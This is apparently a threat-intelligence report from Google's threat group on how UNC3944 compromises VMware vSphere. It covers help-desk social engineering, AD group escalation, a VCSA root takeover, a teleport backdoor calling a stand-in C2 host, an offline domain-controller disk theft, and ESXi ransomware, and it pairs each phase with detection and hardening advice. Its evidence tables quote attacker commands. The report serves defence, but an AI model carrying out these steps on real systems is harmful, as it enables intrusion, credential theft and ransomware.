In mid-2025, Google Threat Intelligence Group (GTIG) identified a sophisticated and aggressive cyber campaign targeting multiple industries, including retail, airline, and insurance. This was the work of UNC3944, a financially motivated threat group that has exhibited overlaps with public reporting of “0ktapus,” “Octo Tempest,” and “Scattered Spider.” Following public alerts from the Federal Bureau of Investigation (FBI), the group’s targeting became clear: GTIG observed that the group was suspected of turning its ransomware and extortion operations to the U.S. retail sector. The campaign soon broadened further, with airline and transportation organizations in North America also becoming targets.
The group’s core tactics have remained consistent and do not rely on software exploits. Instead, they use a proven playbook centered on phone calls to an IT help desk. The actors are aggressive, creative, and particularly skilled at using social engineering to bypass even mature security programs. Their attacks are not opportunistic but are precise, campaign-driven operations aimed at an organization’s most critical systems and data.
Their strategy is rooted in a “living-off-the-land” (LotL) approach. After using social engineering to compromise one or more user accounts, they manipulate trusted administrative systems and use their control of Active Directory as a launchpad to pivot to the vSphere environment, providing an avenue to exfiltrate data and deploy ransomware directly from the hypervisor. This method is highly effective because it generates few traditional indicators of compromise (IoCs) and bypasses security tools like endpoint detection and response (EDR), which often have limited or no visibility into the ESXi hypervisor and vCenter Server Appliance (VCSA).
Before discussing key detection signals and hardening strategies related to UNC3944’s vSphere-related operations, it’s important to understand vSphere logging and the distinction between vCenter Events and ESXi host logs. When forwarded to a central syslog server, vCenter Server events and ESXi host logs represent two distinct yet complementary sources of data. Their fundamental difference lies in their scope, origin, and the structured, event-driven nature of vCenter logs versus the verbose, file-based output of ESXi.
1. vCenter Server (VC Events)
vCenter events operate at the management plane, providing a structured audit trail of administrative actions and automated processes across the entire virtual environment. Each event is a discrete, well-defined object identified by a unique eventTypeId, such as VmPoweredOnEvent or UserLoginSessionEvent. This programmatic identification makes them ideal for ingestion into Security Information and Event Management (SIEM) platforms like Splunk or Google Chronicle for automated parsing, alerting, and security analysis.
Figure 1: VC Event log structure
Native storage & syslog forwarding: These events are generated by vCenter Server and stored within its internal VCSA database (PostgreSQL). When forwarded, vCenter streams a real-time copy of these structured events to the syslog server. The resulting log message typically contains the formal eventTypeId along with its human-readable description, allowing for precise analysis.
Primary use cases:
Security auditing & forensics: Tracking user actions, permission changes, and authentication
Change management: Providing a definitive record of all configuration changes to clusters, hosts, and virtual machines (VMs)
Automated alerting: Triggering alerts in a SIEM or monitoring tool based on specific eventTypeIds (e.g., HostCnxFailedEvent)
Examples of vCenter Events
As documented in resources like the vCenter Event Mapping repository, each event has a specific programmatic identifier.
UserLoginSessionEvent
Description: “User {userName}@{ipAddress} logged in as {locale}”
Significance: A critical security event for tracking all user access to the vCenter management plane
VmCreatedEvent
Description: “Created virtual machine {vm.name} on {host.name} in {datacenter.name}”
Significance: Logs the creation of new inventory objects, essential for asset management and change control
VmPoweredOffEvent
Description: “Virtual machine {vm.name} on {host.name} in {datacenter.name} is powered off”
Significance: Tracks the operational state and availability of workloads. An unexpected power-off event is a key indicator for troubleshooting.
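To illustrate the automated-alerting use case, here is a rough, unofficial sketch of a SIEM-side filter over a forwarded syslog stream. The regex and watchlist are assumptions, since message layout varies by vCenter version and syslog configuration:

```python
# Minimal sketch: flag security-relevant vCenter events in forwarded syslog.
# The regex and watchlist are illustrative; real message formats vary.
import re
import sys

WATCHLIST = {
    "UserLoginSessionEvent",   # all management-plane logins
    "HostCnxFailedEvent",      # host connectivity failures
    "VmCreatedEvent",          # new inventory objects
    "VmPoweredOffEvent",       # unexpected workload power-offs
}

EVENT_RE = re.compile(r"(?P<id>\b[A-Za-z][A-Za-z.]*Event\b)")

for line in sys.stdin:
    match = EVENT_RE.search(line)
    if match and match.group("id") in WATCHLIST:
        print(f"[ALERT] {match.group('id')}: {line.rstrip()}")
```

Piping the central syslog stream into this script (for example, via tail -f) would emit one alert line per matching event.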
Note on VCSA Logging Limitations: The VCSA does not, out-of-the-box, support forwarding critical security logs for denied network connections or shell command activity. To enable this non-default capability, a custom configuration at the native Photon OS level is required. This is an agentless approach that leverages only built-in Linux tools (like iptables and logger) and does not install any third-party software. This configuration pipes firewall and shell events into the VCSA’s standard rsyslog service, allowing the built-in remote logging mechanism to forward them to a central SIEM.
2. ESXi Host Logs
ESXi logs operate at the hypervisor level, providing granular, host-specific operational data. They contain detailed diagnostic information about the kernel, hardware, storage, networking, and services running directly on the ESXi host.
Native storage: These logs are enabled by default and stored as a collection of plain text files on the ESXi host itself, primarily within the /var/log/ directory. This storage is often a local disk or a persistent scratch partition. If a persistent location is not configured, these logs are ephemeral and will be lost upon reboot, making syslog forwarding essential for forensics.
Figure 2: ESXi standard log structure
Primary use cases:
Deep-dive troubleshooting of performance issues
Diagnosing hardware failures or driver issues
Analyzing storage and network connectivity problems
Examples of ESXi log entries sent to syslog:
(from vmkernel.log): Detailed logs about storage device latency
(from hostd.log): Logs from the host agent, including API calls, VM state changes initiated on the host, and host service activity
(from auth.log): Records of successful or failed login attempts directly to the host via SSH or the DCUI
3. ESXi Host Audit Logs
ESXi audit records provide a high-fidelity, security-focused log of actions performed directly on an ESXi host. The following analysis of the provided example demonstrates why this log source is forensically superior to standard logs for security investigations. These logs are not enabled by default.
Native storage & persistence: These records are written to audit.*.log on the host’s local filesystem, governed by the Syslog.global.auditRecord.storageEnable = TRUE parameter. Persistent storage configuration is critical to ensure this audit trail survives a reboot.
Figure 3: ESXi audit log structure
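As a brief sketch using the same OptionManager pattern as the earlier examples (only the storage key named above is used; applying it is per host), enabling persistent audit records could look like:

```python
# Minimal sketch: enable persistent ESXi audit records on a single host.
# Assumes the key is exposed via the host's advanced options, as on
# recent ESXi releases; verify against your version's documentation.
from pyVmomi import vim

def enable_audit_records(host: vim.HostSystem) -> None:
    host.configManager.advancedOption.UpdateOptions(changedValue=[
        vim.option.OptionValue(
            key="Syslog.global.auditRecord.storageEnable", value=True),
    ])
```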
Forensic analysis: standard vs. audit log: In the provided scenario, a threat actor logs into an ESXi host, attempts to run malware, and disables the execInstalledOnly security setting. Here is how each log type captures this event:
Standard syslog shell.log analysis: The standard log provides a simple, chronological history of commands typed into the shell.
Figure 4: ESXi standard log output
Limitations:
No login context: It does not show the threat actor’s source IP address or that the initial SSH login was successful.
No outcome: It shows the command ./malware was typed but provides no information on whether it succeeded or failed.
Incomplete narrative: It is merely a command history, lacking the essential context needed for a full security investigation.
ESXi audit log analysis: The ESXi audit log provides a rich, structured, and verifiable record of the entire session, from connection to termination, including the outcome of each command.
Figure 5: ESXi audit log output
Successful login: It explicitly records the successful authentication, including the source IP.
Failed malware execution: This is the most critical distinction. The audit log shows that the malware execution failed with an exit status of 126.
Successful security disablement: It then confirms that the command to disable a key security feature was successful.
This side-by-side comparison proves that while standard ESXi logs show a threat actor’s intent, the ESXi audit log reveals the actual outcome, providing actionable intelligence and a definitive forensic trail. A comprehensive logging strategy for a vSphere environment requires the collection and analysis of three distinct yet complementary data sources. When forwarded to a central syslog server, vCenter Server events, ESXi host audit records, and standard ESXi operational logs provide a multilayered view of the environment’s security, administrative changes, and operational health.
| Characteristic | vCenter Server Events | ESXi Audit Logs | ESXi Standard Logs |
| --- | --- | --- | --- |
| Scope | vCenter, ESXi | ESXi | ESXi |
| Enabled by Default | Yes | No | Yes |
| Format | Structured Objects (eventTypeId) | Verbose, Structured Audit Entries | Unstructured/Semi-structured Text |
| Type | Administrative, Management, Audit | Security Audit, Kernel-level Actions | Management, System-Level State |
| Primary Storage | VCSA Internal Database | Local Filesystem (audit.*.log) | Local Filesystem (/var/log/) |
| Primary Use Case | Central Auditing, Full Cluster Management, Forensics | Direct Host Forensics, Compliance | Deep Troubleshooting, Diagnostics |
Table 1: Comparison of ESXi Logs and vCenter Events
Anatomy of an Attack: The Playbook
UNC3944’s attack unfolds across five distinct phases, moving methodically from a low-level foothold to complete hypervisor control.
Figure 6: Typical UNC3944 attack chain
Phase 1: Initial Compromise, Recon, and Escalation
This initial phase hinges on exploiting the human element.
The tactic: The threat actor initiates contact by calling the IT help desk, impersonating a regular employee. Using readily available personal information from previous data breaches and employing persuasive or intimidating social engineering techniques, they build rapport and convince an agent to reset the employee’s Active Directory password. Once they have this initial foothold, they begin a two-pronged internal reconnaissance mission:
Path A (information stores): They use their new access to scan internal SharePoint sites, network drives, and wikis. They hunt for IT documentation, support guides, org charts, and project plans that reveal high-value targets. This includes not only the names of individual Domain or vSphere administrators, but also the discovery of powerful, clearly named Active Directory security groups like “vSphere Admins” or “ESX Admins” that grant administrative rights over the virtual environment.
Path B (secrets stores): Simultaneously, they scan for access to password managers like HashiCorp Vault or other Privileged Access Management (PAM) solutions. If they find one with weak access controls, they will attempt to enumerate it for credentials.
Armed with the name of a specific, high-value administrator, they make additional calls to the help desk. This time, they impersonate the privileged user and request a password reset, allowing them to seize control of a privileged account.
Why it’s effective: This two-step process bypasses the need for technical hacking like Kerberoasting for the initial escalation. The core vulnerability is a help desk process that lacks robust, non-transferable identity verification for password resets. The threat actor is more confident and informed on the second call, making their impersonation much more likely to succeed.
Key detection signals:
[LOGS] Monitor for command-line and process execution: Implement robust command-line logging (e.g., via Audit Process Creation, Sysmon Event ID 1 or EDR). Create alerts for suspicious remote process execution, such as wsmprovhost.exe (WinRM) launching native tools like net.exe to query or modify sensitive groups (e.g., net group "ESX Admins" /add).
[LOGS] Monitor for group membership changes: Create high-priority alerts for AD Event ID 4728 (A member was added to a security-enabled global group) or 4732 (local group) for any changes to groups named “vSphere Admins,” “ESX Admins,” or similar.
[LOGS] Correlate AD password resets with help desk activity: Correlate AD Event ID 4724 (Password Reset) and the subsequent addition of a new multi-factor authentication (MFA) device with help desk ticket logs and call records (see the correlation sketch after this list).
[BEHAVIOR] Alert on anomalous file access: Alert on a single user accessing an unusually high volume of disparate files or SharePoint sites, which is a strong indicator of the reconnaissance seen during UNC3944 activity.
[CRITICAL BEHAVIOR] Monitor Tier 0 account activity: Any password reset on a Tier 0 account (Domain Admin, Enterprise Admin, vSphere) must be treated as a critical incident until proven otherwise.
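The correlation sketch referenced above might look like the following. It is a minimal illustration only: ad_resets.csv and helpdesk_tickets.csv are hypothetical exports with epoch,account columns, and the one-hour window is an arbitrary starting point.
```
# Minimal correlation sketch, not a production detection. ad_resets.csv and
# helpdesk_tickets.csv are hypothetical "epoch,account" exports; adapt the
# field layout to your SIEM and ticketing system.
while IFS=, read -r reset_epoch account; do
    # A reset is suspicious when no help desk ticket exists for the same
    # account in the hour preceding the reset (AD Event ID 4724).
    if ! awk -F, -v acct="$account" -v lo=$((reset_epoch - 3600)) -v hi="$reset_epoch" \
            '$2 == acct && $1 >= lo && $1 <= hi { found = 1 } END { exit !found }' \
            helpdesk_tickets.csv; then
        echo "ALERT: unticketed password reset for account $account"
    fi
done < ad_resets.csv
```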
Critical hardening and mitigation:
[CRITICAL] Prohibit phone-based resets for privileged accounts: For all Tier 0 accounts, enforce a strict “no password resets over the phone” policy. These actions must require an in-person, multipart, or high-assurance identity verification process.
Protect and monitor privileged AD groups: Treat these groups as Tier 0 assets: tightly control who can modify their membership and implement high-fidelity alerting for any membership change (AD Event ID 4728/4732). This is critical because threat actors use native tools like net.exe, often via remote protocols like WinRM, to perform this manipulation. Avoid obvious, non-obfuscated names like “vSphere Admins” for security groups that grant high-level privileges.
Harden information stores: Implement data loss prevention (DLP) and data classification to identify and lock down sensitive IT documentation that could reveal high-value targets. Treat secrets vaults as Tier 0 assets with strict, least-privilege access policies.
Restrict or monitor remote management tools: Limit the use of remote management protocols like WinRM and vSphere management APIs to authorized administrative subnets and dedicated PAWs. Log all remote commands for review and anomaly detection.
Table 2 displays threat actor actions in support of Active Directory escalation, along with process and command-line data that an organization may use to detect this activity.
| Process Name | Command Line | Tactic | Threat Actor’s Goal |
| --- | --- | --- | --- |
| explorer.EXE | "C:\Program Files\…\WORDPAD.EXE" "\\10.100.20.55\c$\Users\j.doe\…\ACME Power Division\Documents\Procedure for Deploying ESXi…docx" | Reconnaissance | Threat actor, using a compromised user account, opens IT procedure documents to understand the vSphere environment and find target names. |
| | | Reconnaissance | Threat actor continues recon, opening files on a management server that likely contain names of systems, groups, or administrators. |
| wsmprovhost.exe | "C:\…\net.exe" group "ESX Admins" | Enumeration | Having found the group name, the threat actors use WinRM to remotely query the membership of the “ESX Admins” group to identify targets. |
| wsmprovhost.exe | "C:\…\net.exe" group "ESX Admins" ACME-CORP\temp-adm-bkdr /add | Manipulation | This is the key attack: the threat actor adds their controlled account (temp-adm-bkdr) to the “ESX Admins” group, granting it full admin rights to vSphere. |
| wsmprovhost.exe | "C:\…\net.exe" group "ESX Admins" | Verification | The threat actor queries the group again immediately after the modification to confirm that their malicious user was successfully added. |
Table 2: Active Directory user escalation
Phase 2: The Pivot to vCenter — The Control Plane Compromise
Having mapped Active Directory credentials to vSphere access, the threat actors turn their sights on the heart of the virtual environment.
The tactic: They use the compromised credentials to log into the vSphere vCenter Server GUI. From there, they leverage their vCenter Admin rights to gain what amounts to “virtual physical access” to the VCSA itself. They open a remote console, reboot the appliance, and edit the GRUB bootloader to start with a root shell (init=/bin/bash), giving them passwordless root access. They then change the root password to enable SSH access upon reboot. To maintain their foothold, they upload and execute teleport, a legitimate open source remote access tool, to create a persistent and encrypted reverse shell (C2 channel) that bypasses most firewall egress rules.
Why it’s effective: vCenter’s delegation of trust to Active Directory, often via LDAP(S), means the initial login isn’t protected by MFA. The VCSA takeover abuses a fundamental privilege of a virtual environment administrator: the ability to interact with a VM’s console pre-boot.
Key detection signals:
[LOGS] Monitor vCenter events for logins (com.vSphere.vc.UserLoginSessionLoginSuccessEvent, com.vSphere.vc.UserLoginSessionLoginFailureEvent) and appliance reboots (com.vSphere.vc.appliance.ApplianceRebootEvent).
[LOGS] Monitor for log entries with prefixes like “SSH” in remote VCSA syslog to detect dropped SSH attempts or other blocked traffic via iptables.
[LOGS] On the VCSA, monitor journald and implement VCSA remote forwarding of logs to a SIEM to detect unauthorized shell access and the enablement of the SSH and Shell services.
Figure 7: Remote syslog events for enablement of VCSA SSH service
[NETWORK] Use Network Flow Logs to spot anomalous outbound connections from the VCSA’s IP address.
[NETWORK] Unusual DNS requests from vCenter: This detection identifies when a vSphere vCenter server makes DNS requests for domains that are not on the explicit allow list of known, trusted sites (e.g., vSphere.com, ntp.org, or internal domains).
[LOGS] Use of cURL or Wget to download tools: This detection can identify the use of command-line utilities like cURL or Wget on a critical server (such as a vCenter, Domain Controller, or database server) to download a file from an external URL.
Critical hardening and mitigation:
[CRITICAL] Enable VCSA remote logging: Implement remote syslog forwarding on the VCSA appliance.
[CRITICAL] Enforce phishing-resistant MFA on vCenter: Implement a phishing-resistant MFA solution, such as FIDO2/WebAuthn, for all vCenter logins by federating authentication with a supported identity provider. This is a critical control that directly neutralizes the threat of credential theft, rendering phishing attacks against vCenter users ineffective.
[CRITICAL] Enforce least privilege in vCenter: Strictly limit the use of the Administrator role, reserving it for dedicated “break glass” accounts only, such as administrator@vsphere.local. Instead, create granular, custom roles for specific job functions to ensure users and groups have only the minimum permissions necessary, breaking the link between a compromised AD account and a full vCenter takeover.
[CRITICAL] Use the VCSA firewall and block shell access: Block all unnecessary outbound internet traffic from the VCSA using egress filtering and its built-in firewall. Disable the SSH and BASH shells by default. This thwarts the teleport backdoor and makes the VCSA takeover significantly more difficult.
[CRITICAL] Configure the VCSA’s underlying iptables firewall: Enforce a Zero Trust allow-list for all management interfaces (443, 5480, 22) and enable logging for all denied connections. The default VCSA GUI firewall can be disabled by an attacker with a compromised web session and, crucially, it does not log blocked connection attempts. By configuring iptables at the OS level, the rules become immune to GUI tampering, and every denied connection is logged and forwarded to your SIEM.
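A minimal sketch of such a policy is shown below; the administrative subnet 10.20.0.0/24 is a placeholder and the rule set is deliberately simplified, so adapt and test it on a non-production appliance first.
```
# Sketch of a Zero Trust allow-list for VCSA management interfaces.
# 10.20.0.0/24 is a placeholder admin subnet.
iptables -A INPUT -i lo -j ACCEPT
iptables -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT

# Permit 443 (HTTPS), 5480 (VAMI), and 22 (SSH) only from the admin subnet.
for port in 443 5480 22; do
    iptables -A INPUT -p tcp -s 10.20.0.0/24 --dport "$port" -j ACCEPT
done

# Log, then drop, everything else so every denied connection reaches the SIEM.
iptables -A INPUT -j LOG --log-prefix "VCSA-FW-DENY: " --log-level 4
iptables -A INPUT -j DROP
```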
Table 3 displays threat actor actions in support of the Teleport installation, along with key evidence that an organization may use to detect this activity.
| Tactic | Key Script Evidence | Threat Actor’s Goal |
| --- | --- | --- |
| Verify Root Privileges | | The threat actor executes the installer via sudo. The script’s first action is to confirm it has the root permissions required for system-wide installation. |
| Define Installation Parameters | SCRIPT_NAME="teleport-installer"; TELEPORT_BINARY_DIR="/usr/local/bin"; TELEPORT_CONFIG_PATH="/etc/teleport.yaml" | The script defines its core parameters, including where the backdoor’s binaries and configuration files will be placed on the compromised VCSA’s filesystem. |
| Hardcode C2 & Authentication Details | TARGET_HOSTNAME='c2.attacker.net'; JOIN_TOKEN='[REDACTED_JOIN_TOKEN]'; CA_PIN_HASHES='sha256:[REDACTED_CA_PIN_HASH]' | The threat actor embeds the unique, pre-generated credentials required for the agent to connect and authenticate to their external command-and-control (C2) server. |
| Detect OS & Select Package Type | if [[ ${f} != "tarball" && ${f} != "deb" ... | The script contains logic to detect the underlying operating system (e.g., Debian, RHEL, or a generic Linux like the VCSA) to ensure it uses the correct installation package (.deb, .rpm, or .tar.gz). |
| Download & Install Binaries | Script logic proceeds to download the ‘tarball’ package and unpacks binaries to /usr/local/bin | Based on the OS detection, the script downloads the appropriate Teleport package from a threat actor-controlled source and installs the binaries (teleport, tsh, tctl) into the predefined directory. |
| Establish Persistence | [Implied action] Script creates and enables a systemd unit file | To ensure the backdoor survives reboots, the script creates a systemd service file using the defined path. It then enables and starts the teleport service, which initiates the final, persistent connection to the C2 server. |
Table 3: VCSA Teleport installation
Phase 3: The Hypervisor Heist — Offline Credential Theft and Exfiltration
This is where the threat actor leverages their vSphere control to operate beneath the notice of in-guest security and EDR.
The tactic: From vCenter, the threat actor enables SSH on the ESXi hosts and resets their root passwords. They then execute an offline attack by identifying a Domain Controller VM, powering it off, and detaching its virtual disk (.vmdk). This disk is then attached as a secondary drive to a forgotten or “orphaned” VM they control. From this unmonitored machine, they copy the NTDS.dit Active Directory database. The process is then reversed, and the DC is powered back on as if nothing happened. The stolen data is then moved in a two-stage process: first, an internal transfer from the orphaned VM to the compromised VCSA using sftp, and second, an external exfiltration from the VCSA through the already-established teleport C2 channel to a threat actor-controlled cloud service.
Why it’s effective: This entire operation occurs at the hypervisor layer, making it invisible to any EDR or security agent running inside the Domain Controller’s operating system. The use of the VCSA as a data funnel bypasses any network segmentation rules.
Table 4 displays threat actor actions in support of VM data exfiltration along with key evidence that an organization may use to detect this activity.
| Tactic | Evidence Source | Key Evidence | Threat Actor’s Goal |
| --- | --- | --- | --- |
| Identify Target VM | Browser History | URL: https://vcsa-prod-01.acme.local/ui/...; Page Title: vSphere – ACME-DC01 – Datastores | The threat actor, logged in as a compromised user, browses the vSphere UI to locate the virtual machine for the target Domain Controller (ACME-DC01). |
| Identify Staging VM | Browser History | URL: https://vcsa-prod-01.acme.local/ui/...; Page Title: vSphere – OLD-APPSRV-01 – Networks | The threat actor identifies a seemingly abandoned server (OLD-APPSRV-01) to use as their staging VM, onto which they will mount the DC’s disk. |
| Execute Disk Swap | vCenter Event Log | Event: [vim.event.VmReconfiguredEvent]; User: ACME\threat.actor; Action: Reconfigured OLD-APPSRV-01 on esxi-prod-02.acme.local | The threat actor triggers a VM reconfiguration on the staging VM. This is the start of the disk attachment process. |
| Execute Disk Swap | vCenter Event Log | | The log shows a disk device being modified on the staging VM. The source file path clearly shows that the virtual disk (.vmdk) belonging to the Domain Controller (ACME-DC01) is being attached. |
| Execute Disk Swap | ESXi Host Log | | Simultaneously, the ESXi host logs the ReconfigVM_Task being executed against the staging VM, confirming the action was carried out at the hypervisor level. |
Table 4: Virtual machine data exfiltration
Key detection signals:
[BEHAVIOR] Monitor for reconnaissance in the vSphere UI: Before the attack, the threat actor browses the vSphere client to identify their target (e.g., a VM named ACME-DC01) and their staging VM (OLD-APPSRV-01). If UI access logs or browser histories from admin workstations are available, correlating suspicious browsing patterns with a subsequent reconfiguration event can provide very early warning.
[LOGS] Scrutinize VM reconfiguration events: As shown in this anonymized real-world example, a vim.event.VmReconfiguredEvent for the staging VM (e.g., OLD-APPSRV-01) will contain the file path of the target VM’s disk in its configuration details (e.g., backing = (fileName = '.../ACME-DC01/ACME-DC01_4.vmdk' ...)). Create high-priority alerts that parse this event data to detect when a disk from a critical asset is attached to any non-standard machine.
[LOGS] Correlate the full event sequence: A high-fidelity alert can be built by correlating the full sequence of vCenter events on a critical asset: VmPoweredOffEvent, followed by the VmReconfiguredEvent detailed above, and eventually a VmPoweredOnEvent combined with a restart initiated by vmtoolsd.exe, along with supporting Windows guest events like 6006 (shutdown) and 6005 (startup). A minimal correlation sketch follows this list.
[BEHAVIOR] Create CRITICAL alerts for any power-on or reconfiguration event on VMs located in a “Decommissioned” or “Orphaned” folder, as these are prime candidates for the threat actor’s staging VM.
[LOGS] Monitor ESXi host changes: Alert on SSH service start via vCenter events (vim.event.HostServiceStartedEvent), firewall configuration changes (vim.event.HostFirewallInfoChangedEvent), and direct root shell access logs on the ESXi hosts themselves.
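The sketch below illustrates the disk-swap correlation described in this list. It is deliberately simplified: vcenter_events.jsonl is a hypothetical JSON-lines export, and the epoch, eventTypeId, and fullFormattedMessage field names are assumptions to map onto your SIEM’s real schema.
```
# Simplified correlation sketch; the export file and field names are
# assumptions, not a vCenter API.
TARGET_VM="ACME-DC01"   # critical asset to watch

# Keep events that mention the target VM: its own power events plus the
# staging VM's VmReconfiguredEvent, which embeds the target's .vmdk path.
jq -r --arg vm "$TARGET_VM" \
   'select(.fullFormattedMessage | contains($vm)) | "\(.epoch) \(.eventTypeId)"' \
   vcenter_events.jsonl | sort -n |
awk '/VmPoweredOffEvent/   { off = $1 }
     /VmReconfiguredEvent/ { if (off && $1 - off <= 1800) reconf = $1 }
     /VmPoweredOnEvent/    { if (reconf && $1 - reconf <= 1800)
                               print "ALERT: possible offline disk swap at epoch " $1 }'
```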
Critical hardening and mitigation:
[CRITICAL] Use vSphere VM encryption: Encrypt all Tier 0 virtualized assets. This is the definitive technical block for the offline “Disk Swap” attack as the stolen .vmdk file would be unreadable.
[CRITICAL] Implement a strict VM decommissioning process: Formally decommission old VMs by deleting their disks. Do not leave powered-off, “orphaned” VMs on your datastores as these are the ideal workbenches for threat actors.
[CRITICAL] Harden ESXi accounts: Disable the default ESXi root account in favor of a named “break glass” account with a highly complex password. On ESXi 8.0+, run esxcli system account set -i vpxuser -s false to prevent a compromised vCenter user from changing ESXi root passwords.
[CRITICAL] Enable ESXi remote audit logging: Enable remote ESXi audit logging (vpxa.log, hostd.log, audit_records) to a SIEM to provide verbose, centralized details of security-focused events on the hosts themselves.
Figure 8: Remote syslog events for SSH access to ESXi
Phase 4: Backup Sabotage — Removing the Safety Net
Before deploying ransomware, the actor ensures their target cannot recover.
The tactic: Leveraging their full control over Active Directory, the threat actor targets the backup infrastructure (e.g., a virtualized backup server). They either reuse the compromised Domain Admin credentials to log in via RDP or, more stealthily, add a user they control to the “Veeam Administrators” security group in AD. Once in, they delete all backup jobs, snapshots, and repositories.
Why it’s effective: This works due to a lack of administrative tiering (where the same powerful accounts manage both virtualization and backups) and insufficient monitoring of changes to critical AD security groups.
Key detection signals:
[Detecting Path A] Monitor for interactive logons (Windows Event ID 4624) on the backup server by high-privilege accounts.
[Detecting Path B] Trigger a CRITICAL alert from AD logs on Event ID 4728 (“A member was added to a security-enabled global group”) for any change to the “Veeam Administrators” group.
[LOGS] Monitor the backup application’s own audit logs for mass deletion events.
Critical hardening and mitigation:
[CRITICAL] Isolate backup infrastructure: The Veeam server and its repositories must sit in a separate, MFA-protected, highly restricted security domain or use dedicated, non-AD-joined credentials. This severs the AD trust relationship the threat actor exploits.
[CRITICAL] Utilize immutable repositories: This is the technical backstop against backup deletion. It makes the backup data undeletable for a set period, even if a threat actor gains full administrative access to the backup console.
Phase 5: Encryption — Ransomware from the Hypervisor
With the target blinded and their safety net gone, the final stage commences.
The tactic: The threat actor uses their SSH access to the ESXi hosts to push their custom ransomware binary via SCP/SFTP into a writable directory like /tmp. They then execute a script that uses the native ESXi command-line tool, vim-cmd, to forcibly power off every VM on the host. Finally, they launch the ransomware binary (often with nohup to ensure it continues after they log out), which scans the datastores and encrypts all VM files (.vmdk, .vmx, etc.).
Table 5 displays threat actor actions in support of ESXi ransomware execution along with key evidence that an organization may use to detect this activity.
| Tactic | Source Log File | Key Evidence | Threat Actor’s Goal |
| --- | --- | --- | --- |
| SSH Login | /var/log/auth.log | SSH session was opened for 'root@10.10.10.5' | The threat actor logs in as root to the compromised ESXi host via an interactive SSH session. |
| Prepare Payload | /var/log/shell.log | chmod 0777 encrypt.out; cp encrypt.out encrypt_.out | The threat actor’s commands to make the ransomware payload executable are captured by the ESXi shell log. |
| Create Exclusion List | /var/log/shell.log | echo VCSA-01-PROD >> list.txt; echo DC-01-PASSIVE >> list.txt | The shell log records the creation of the list.txt file, revealing the threat actor’s intent to selectively encrypt systems. |
| Launch Ransomware | /var/log/shell.log | | The exact command to launch the time-delayed ransomware, including the key and exclusion list, is logged. The nohup command ensures it runs after they log out. |
| Clean Up & Exit | /var/log/shell.log | ls nohup.out; exit | The threat actor’s final commands and session termination are recorded before they exit, leaving the payload to run. |
Table 5: ESXi ransomware execution
Why it’s effective: Root access on the ESXi shell is the highest level of privilege in a virtual environment. By encrypting at the hypervisor level, the threat actor bypasses all in-guest security and compromises every hosted server in a single action.
Key detection signals:
[NETWORK] Monitor Network Flow Logs for large file transfers to and from ESXi hosts over SSH/SCP.
[BEHAVIOR] A SIEM alert for a high volume of VM power-off commands originating from a single ESXi host is a high-fidelity indicator of an ongoing attack.
[LOGS] Monitor ESXi host logs for the execution of esxcli system settings kernel set -s execInstalledOnly -v FALSE (a threat actor attempting to disable a key defense) and mass vmsvc/power.off commands. Since this setting only applies after a reboot, correlate this alert with a subsequent host reboot within a short time window.
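As a minimal illustration of both signals, the sketch below sweeps a forwarded ESXi shell log; the log path and the alert threshold are assumptions to tune for your collector.
```
# Sketch only: sweep a forwarded ESXi shell log for the two signals above.
# The path and the threshold of 5 are assumptions.
LOG=/var/log/remote/esxi/shell.log

# 1. An attempt to disable the execInstalledOnly protection.
grep -q "settings kernel set.*execInstalledOnly.*FALSE" "$LOG" \
    && echo "ALERT: execInstalledOnly disable attempt recorded in $LOG"

# 2. A burst of forced VM power-offs from the host shell.
count=$(grep -c "vim-cmd vmsvc/power.off" "$LOG")
[ "$count" -ge 5 ] && echo "ALERT: $count power-off commands -- possible mass shutdown"
```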
Critical hardening and mitigation:
[CRITICAL] Enable vSphere lockdown mode: This is a primary prevention for this phase as it blocks the interactive SSH access needed to push and execute the payload.
[CRITICAL] Enforce the execInstalledOnly execution policy: This ESXi kernel setting is the definitive technical prevention. It blocks any unsigned binary from running, causing the threat actor’s custom ransomware execution to fail. Enable the hardware-based TPM 2.0 chip with Secure Boot to lock this setting so it cannot be disabled.
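For reference, enabling the control uses the same esxcli namespace as the disable attempt shown in the detection signals above:
```
# Enforce execInstalledOnly on an ESXi host (the counterpart of the disable
# command attackers run). As noted above, it fully applies only after a
# reboot, and TPM 2.0 with Secure Boot keeps it from being flipped back.
esxcli system settings kernel set -s execInstalledOnly -v TRUE

# Verify the configured and runtime values.
esxcli system settings kernel list -o execInstalledOnly
```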
The Three-Pillar Defense: A Fortified Strategy
Pillar 1: Proactive Hardening (Your Most Reliable Defense)
Architect for centralized access: Do not join ESXi hosts directly to Active Directory. Manage all host access exclusively through vCenter roles and permissions. This drastically reduces the attack surface.
Enable vSphere lockdown mode: This is a critical control that restricts ESXi management, blocking direct shell access via SSH and preventing changes from being made outside of vCenter.
Enforce execInstalledOnly: This powerful ESXi kernel setting prevents the execution of any binary that wasn’t installed as part of a signed, packaged vSphere Installation Bundle (VIB). It would have directly blocked the threat actor’s custom ransomware from running.
Use vSphere VM encryption: Encrypt your Tier 0 virtualized assets (DCs, PKI, etc.). This is the definitive technical block for the offline disk-swap attack, rendering any stolen disk files unreadable.
Practice strict infrastructure hygiene: Don’t just power off old VMs. Implement a strict decommissioning process that deletes their disks from the datastore or moves them to segregated archival storage to eliminate potential “staging” machines.
Posture management: It is vital to implement continuous posture management (CPM) because hardening is not a one-time task but a security state that must be constantly maintained against “configuration drift.” The UNC3944 playbook fundamentally relies on creating these policy deviations, such as enabling SSH or altering firewall rules. Continuous auditing can be achieved either through dedicated hybrid cloud security posture management (CSPM) tools, such as the vSphere Aria Operations Compliance Pack or Wiz, or through custom in-house scripts that leverage the vSphere API via PowerShell/PowerCLI to regularly audit your environment (a minimal example of the scripted approach follows this list).
Harden the help desk: For privileged accounts, mandate that MFA enrollment or password resets require an in-person, multipart, or high-assurance multi-factor verification process.
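As one example of the scripted posture audit mentioned above, the sketch below uses the open source govc CLI from the govmomi project rather than PowerCLI. govc, its subcommand names, and the output parsing are assumptions to validate against your own tooling and versions.
```
# Drift-audit sketch using the open source govc CLI (an assumption; verify
# subcommands and output columns against your govc version).
export GOVC_URL='https://vcsa-prod-01.acme.local'
export GOVC_USERNAME='audit-ro'   # placeholder read-only account
export GOVC_PASSWORD='...'        # placeholder

# Flag any host where the SSH service (TSM-SSH) is running -- a hallmark of
# the UNC3944 playbook and a clear policy deviation.
for host in $(govc find / -type h); do
    if govc host.service.ls -host "$host" | grep -Eq 'TSM-SSH.*(true|Running)'; then
        echo "DRIFT: SSH enabled on $host"
    fi
done
```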
Pillar 2: Identity and Architectural Integrity (Breaking the Attack Chain)
